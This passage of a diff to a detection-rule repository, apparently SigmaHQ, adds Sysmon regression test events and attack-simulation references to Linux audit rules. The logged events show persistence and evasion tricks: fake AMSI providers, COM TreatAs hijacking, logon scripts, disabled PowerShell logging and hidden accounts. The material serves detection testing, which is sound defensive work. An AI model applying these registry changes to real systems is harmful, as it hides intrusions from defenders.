}, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T23:49:35.941239Z" + } + }, + "EventRecordID": 16380977, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-25 23:49:35.941", + "ProcessGuid": "5AA13A44-620F-68FD-9A3E-000000004002", + "ProcessId": 9952, + "Image": "C:\\Windows\\system32\\regsvr32.exe", + "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers\\{00000000-DEAD-DEAD-DEAD-B2B2E0859059}\\(Default)", + "Details": "FakeAmsi", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/info.yml b/regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/info.yml new file mode 100644 index 000000000..07e597d64 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/info.yml @@ -0,0 +1,13 @@ +id: 825fc38f-ff54-4338-8016-6f3477c7aa8f +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 33efc23c-6ea2-4503-8cfe-bdf82ce8f705 + title: Potential Persistence Via New AMSI Providers - Registry +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_persistence_amsi_providers/33efc23c-6ea2-4503-8cfe-bdf82ce8f705.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.evtx b/regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.evtx new file mode 100644 index 000000000..ddd48cf12 Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.json b/regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.json new file mode 100644 index 000000000..c1650198e --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.json @@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T23:53:11.117530Z" + } + }, + "EventRecordID": 16447792, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-25 23:53:11.114", + "ProcessGuid": "5AA13A44-62E7-68FD-C13E-000000004002", + "ProcessId": 8536, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500_Classes\\CLSID\\{97D47D56-3777-49FB-8E8F-90D7E30E1A1E}\\TreatAs\\(Default)", + "Details": "{00000001-0000-0000-0000-0000FEEDACDC}", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/info.yml b/regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/info.yml new file mode 100644 index 000000000..9994954f5 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/info.yml @@ -0,0 +1,13 @@ +id: 482ef6c8-3c2a-4b7b-a82e-b09f27576b96 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 9b0f8a61-91b2-464f-aceb-0527e0a45020 + title: Potential COM Object Hijacking Via TreatAs Subkey - Registry +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_persistence_com_key_linking/9b0f8a61-91b2-464f-aceb-0527e0a45020.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.evtx b/regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.evtx new file mode 100644 index 000000000..f1fa9b2aa Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.json b/regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.json new file mode 100644 index 000000000..22263d8c4 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.json @@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T23:56:33.715505Z" + } + }, + "EventRecordID": 16510574, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-25 23:56:33.705", + "ProcessGuid": "5AA13A44-63B1-68FD-D93E-000000004002", + "ProcessId": 9452, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Environment\\UserInitMprLogonScript", + "Details": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\art.bat", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/info.yml b/regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/info.yml new file mode 100644 index 000000000..330bb7320 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/info.yml @@ -0,0 +1,13 @@ +id: 84c6a082-3aa5-4387-b113-60415aeb9458 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 9ace0707-b560-49b8-b6ca-5148b42f39fb + title: Potential Persistence Via Logon Scripts - Registry +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_persistence_logon_scripts_userinitmprlogonscript/9ace0707-b560-49b8-b6ca-5148b42f39fb.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.evtx b/regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.evtx new file mode 100644 index 000000000..86a968f1f Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.json b/regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.json new file mode 100644 index 000000000..2a2f08369 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.json @@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-31T05:57:54.388692Z" + } + }, + "EventRecordID": 657715, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3080, + "ThreadID": 4948 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-31 05:57:54.387", + "ProcessGuid": "14207D89-4FE2-6904-D207-000000004002", + "ProcessId": 5612, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKU\\S-1-5-21-1938467512-983293709-721003795-1103\\Software\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\\EnableScriptBlockLogging", + "Details": "DWORD (0x00000000)", + "User": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/info.yml b/regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/info.yml new file mode 100644 index 000000000..a9a631901 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/info.yml @@ -0,0 +1,13 @@ +id: a6c567e7-d5d4-494b-9a66-71fa87c44f8e +description: N/A +date: 2025-10-31 +author: SigmaHQ Team +rule_metadata: + - id: fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7 + title: PowerShell Logging Disabled Via Registry Key Tampering +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_powershell_logging_disabled/fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.evtx b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.evtx new file mode 100644 index 000000000..98ed7ce3a Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.json b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.json new file mode 100644 index 000000000..57a822e98 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.json @@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T23:59:35.308812Z" + } + }, + "EventRecordID": 16567695, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-25 23:59:35.300", + "ProcessGuid": "5AA13A44-6465-68FD-EF3E-000000004002", + "ProcessId": 7500, + "Image": "C:\\Users\\Administrator\\Downloads\\PsService.exe", + "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Sysinternals\\PsService\\EulaAccepted", + "Details": "DWORD (0x00000001)", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/info.yml b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/info.yml new file mode 100644 index 000000000..2584ad3ad --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/info.yml @@ -0,0 +1,13 @@ +id: 070ba0e3-b1e5-4fa9-9935-ca8a8c233b3d +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 25ffa65d-76d8-4da5-a832-3f2b0136e133 + title: PUA - Sysinternal Tool Execution - Registry +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_execution_via_eula/25ffa65d-76d8-4da5-a832-3f2b0136e133.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.evtx b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.evtx new file mode 100644 index 000000000..f6af04c14 Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.json b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.json new file mode 100644 index 000000000..d5ae043b3 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.json @@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-26T00:00:51.970813Z" + } + }, + "EventRecordID": 16592206, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-26 00:00:51.957", + "ProcessGuid": "5AA13A44-64B2-68FD-FB3E-000000004002", + "ProcessId": 4776, + "Image": "C:\\Users\\Administrator\\Downloads\\FakeSysinternals.exe", + "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Sysinternals\\PsService\\EulaAccepted", + "Details": "DWORD (0x00000001)", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/info.yml b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/info.yml new file mode 100644 index 000000000..42e79ede0 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/info.yml @@ -0,0 +1,13 @@ +id: a977324d-5006-46e6-bb1c-9d8b13344f00 +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: f50f3c09-557d-492d-81db-9064a8d4e211 + title: Suspicious Execution Of Renamed Sysinternals Tools - Registry +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_renamed_execution_via_eula/f50f3c09-557d-492d-81db-9064a8d4e211.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.evtx b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.evtx new file mode 100644 index 000000000..a0246bec5 Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.json b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.json new file mode 100644 index 000000000..57a822e98 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.json @@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-25T23:59:35.308812Z" + } + }, + "EventRecordID": 16567695, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3308, + "ThreadID": 4008 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-25 23:59:35.300", + "ProcessGuid": "5AA13A44-6465-68FD-EF3E-000000004002", + "ProcessId": 7500, + "Image": "C:\\Users\\Administrator\\Downloads\\PsService.exe", + "TargetObject": "HKU\\S-1-5-21-3960063115-309473240-3247002503-500\\Software\\Sysinternals\\PsService\\EulaAccepted", + "Details": "DWORD (0x00000001)", + "User": "ATTACKRANGE\\Administrator" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/info.yml b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/info.yml new file mode 100644 index 000000000..cecb899ec --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/info.yml @@ -0,0 +1,13 @@ +id: 55e4036d-e026-4110-bf9a-a1037f28edbb +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: c7da8edc-49ae-45a2-9e61-9fd860e4e73d + title: PUA - Sysinternals Tools Execution - Registry +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_pua_sysinternals_susp_execution_via_eula/c7da8edc-49ae-45a2-9e61-9fd860e4e73d.evtx diff --git a/regression_data/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.evtx b/regression_data/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.evtx new file mode 100644 index 000000000..9e64486b1 Binary files /dev/null and b/regression_data/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.evtx differ diff --git a/regression_data/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.json b/regression_data/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.json new file mode 100644 index 000000000..d5227b3e4 --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.json @@ -0,0 +1,52 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 13, + "Version": 2, + "Level": 4, + "Task": 13, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-31T05:06:45.377630Z" + } + }, + "EventRecordID": 657154, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 3080, + "ThreadID": 4948 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "srv-01.midgardnet.tech", + "Security": { + "#attributes": { + "UserID": "S-1-5-18" + } + } + }, + "EventData": { + "RuleName": "-", + "EventType": "SetValue", + "UtcTime": "2025-10-31 05:06:45.377", + "ProcessGuid": "14207D89-43E5-6904-4506-000000004002", + "ProcessId": 5244, + "Image": "C:\\Windows\\system32\\reg.exe", + "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\\AtomicOperator$", + "Details": "DWORD (0x00000000)", + "User": "MIDGARDNET\\SwachchhandaP" + } + } +} diff --git a/regression_data/windows/registry/registry_set/registry_set_special_accounts/info.yml b/regression_data/windows/registry/registry_set/registry_set_special_accounts/info.yml new file mode 100644 index 000000000..4c358cfdf --- /dev/null +++ b/regression_data/windows/registry/registry_set/registry_set_special_accounts/info.yml @@ -0,0 +1,13 @@ +id: 3c14b160-a7f5-49a4-beb2-575b70f599b9 +description: N/A +date: 2025-10-31 +author: SigmaHQ Team +rule_metadata: + - id: f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd + title: Hiding User Account Via SpecialAccounts Registry Key +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/registry/registry_set/registry_set_special_accounts/f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd.evtx diff --git a/regression_data/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.evtx b/regression_data/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.evtx new file mode 100644 index 000000000..795232370 Binary files /dev/null and b/regression_data/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.evtx differ diff --git a/regression_data/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.json b/regression_data/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.json new file mode 100644 index 000000000..086ffa666 --- /dev/null +++ b/regression_data/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.json @@ -0,0 +1,46 @@ +{ + "Event": { + "#attributes": { + "xmlns": "http://schemas.microsoft.com/win/2004/08/events/event" + }, + "System": { + "Provider": { + "#attributes": { + "Name": "Microsoft-Windows-Sysmon", + "Guid": "5770385F-C22A-43E0-BF4C-06F5698FFBD9" + } + }, + "EventID": 16, + "Version": 3, + "Level": 4, + "Task": 16, + "Opcode": 0, + "Keywords": "0x8000000000000000", + "TimeCreated": { + "#attributes": { + "SystemTime": "2025-10-24T23:33:08.092105Z" + } + }, + "EventRecordID": 11738, + "Correlation": null, + "Execution": { + "#attributes": { + "ProcessID": 8932, + "ThreadID": 1540 + } + }, + "Channel": "Microsoft-Windows-Sysmon/Operational", + "Computer": "ar-win-dc.attackrange.local", + "Security": { + "#attributes": { + "UserID": "S-1-5-21-3960063115-309473240-3247002503-500" + } + } + }, + "EventData": { + "UtcTime": "2025-10-24 23:33:08.088", + "Configuration": "C:\\Users\\Administrator\\Downloads\\sysmonconfig-trace.xml", + "ConfigurationFileHash": "SHA256=B977839264146AFDE215D41182F78F153F9198EBA8EF0B88426239C33FBDA945" + } + } +} diff --git a/regression_data/windows/sysmon/sysmon_config_modification/info.yml b/regression_data/windows/sysmon/sysmon_config_modification/info.yml new file mode 100644 index 000000000..dff42a8a1 --- /dev/null +++ b/regression_data/windows/sysmon/sysmon_config_modification/info.yml @@ -0,0 +1,13 @@ +id: 54f3ccdd-e1f9-4b9f-8dda-b1bdcb13d6ba +description: N/A +date: 2025-10-24 +author: SigmaHQ Team +rule_metadata: + - id: 8ac03a65-6c84-4116-acad-dc1558ff7a77 + title: Sysmon Configuration Change +regression_tests_info: + - name: Positive Detection Test + type: evtx + provider: Microsoft-Windows-Sysmon + match_count: 1 + path: regression_data/windows/sysmon/sysmon_config_modification/8ac03a65-6c84-4116-acad-dc1558ff7a77.evtx diff --git a/rules/linux/auditd/lnx_auditd_binary_padding.yml b/rules/linux/auditd/lnx_auditd_binary_padding.yml index a625c7423..b8309f04f 100644 --- a/rules/linux/auditd/lnx_auditd_binary_padding.yml +++ b/rules/linux/auditd/lnx_auditd_binary_padding.yml @@ -32,3 +32,8 @@ detection: falsepositives: - Unknown level: high +simulation: + - type: atomic-red-team + name: Pad Binary to Change Hash - Linux/macOS dd + technique: T1027.001 + atomic_guid: ffe2346c-abd5-4b45-a713-bf5f1ebd573a diff --git a/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml b/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml index 48fdc5bd0..6cfcea06b 100644 --- a/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml +++ b/rules/linux/auditd/lnx_auditd_change_file_time_attr.yml @@ -27,3 +27,16 @@ detection: falsepositives: - Unknown level: medium +simulation: + - type: atomic-red-team + name: Set a file's access timestamp + technique: T1070.006 + atomic_guid: 5f9113d5-ed75-47ed-ba23-ea3573d05810 + - type: atomic-red-team + name: Set a file's modification timestamp + technique: T1070.006 + atomic_guid: 20ef1523-8758-4898-b5a2-d026cc3d2c52 + - type: atomic-red-team + name: Modify file timestamps using reference file + technique: T1070.006 + atomic_guid: 631ea661-d661-44b0-abdb-7a7f3fc08e50 diff --git a/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml b/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml index 5121bf17c..4ca7d8d20 100644 --- a/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml +++ b/rules/linux/auditd/lnx_auditd_chattr_immutable_removal.yml @@ -22,3 +22,8 @@ detection: falsepositives: - Administrator interacting with immutable files (e.g. for instance backups). level: medium +simulation: + - type: atomic-red-team + name: Remove immutable file attribute + technique: T1222.002 + atomic_guid: e7469fe2-ad41-4382-8965-99b94dd3c13f diff --git a/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml b/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml index 44ee10449..70b52513f 100644 --- a/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml +++ b/rules/windows/file/file_event/file_event_win_advanced_ip_scanner.yml @@ -27,3 +27,4 @@ detection: falsepositives: - Legitimate administrative use level: medium +regression_tests_path: regression_data/windows/file/file_event/file_event_win_advanced_ip_scanner/info.yml diff --git a/rules/windows/file/file_event/file_event_win_anydesk_artefact.yml b/rules/windows/file/file_event/file_event_win_anydesk_artefact.yml index 8739223b2..a33b96e48 100644 --- a/rules/windows/file/file_event/file_event_win_anydesk_artefact.yml +++ b/rules/windows/file/file_event/file_event_win_anydesk_artefact.yml @@ -25,3 +25,4 @@ detection: falsepositives: - Legitimate use level: medium +regression_tests_path: regression_data/windows/file/file_event/file_event_win_anydesk_artefact/info.yml diff --git a/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations.yml b/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations.yml index 41f7ade4b..3ac06816d 100644 --- a/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations.yml +++ b/rules/windows/file/file_event/file_event_win_create_evtx_non_common_locations.yml @@ -30,3 +30,4 @@ falsepositives: - 